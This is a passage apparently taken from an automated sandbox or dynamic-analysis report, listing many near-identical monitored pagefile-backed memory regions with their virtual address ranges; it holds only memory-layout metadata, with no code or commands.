name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4991 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4992 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4993 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4994 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4995 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 4996 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4997 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4998 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 4999 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5000 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5001 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5002 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5003 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5004 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5005 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5006 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5007 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5008 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5009 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5010 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5011 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5012 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5013 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5014 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5015 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5016 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5017 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5018 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5019 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5020 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5021 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5022 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5023 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5024 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5025 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5026 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5027 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5028 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5029 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5030 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5031 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5032 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5033 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5034 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5035 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5036 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5037 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5038 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5039 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5040 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5041 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5042 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5043 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5044 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5045 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5046 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5047 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5048 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5049 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5050 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5051 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5052 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5053 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5054 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5055 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5056 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5057 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5058 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5059 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5060 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5061 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5062 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5063 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5064 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5065 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5066 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5067 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5068 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5069 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5070 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5071 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5072 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5073 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5074 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5075 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5076 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5077 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5078 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5079 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5080 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5081 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5082 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5083 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5084 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5085 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5086 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5087 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5088 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5089 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5090 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5091 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5092 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5093 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5094 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5095 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5096 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5097 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5098 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5099 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5100 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5101 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5102 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5103 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5104 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5105 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5106 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5107 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5108 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5109 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5110 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5111 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5112 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5113 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5114 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5115 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5116 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5117 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5118 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5119 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5120 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5121 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5122 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5123 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5124 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5125 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5126 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5127 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5128 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5129 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5130 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5131 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5132 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5133 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5134 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5135 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5136 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5137 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5138 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5139 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5140 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5141 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5142 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5143 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5144 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5145 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5146 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5147 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5148 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5149 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5150 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5151 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5152 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5153 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5154 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5155 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5156 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5157 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5158 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5159 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5160 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5161 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5162 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5163 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5164 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5165 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5166 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5167 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 5168 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 5169 start_va = 0x64e0000 end_va 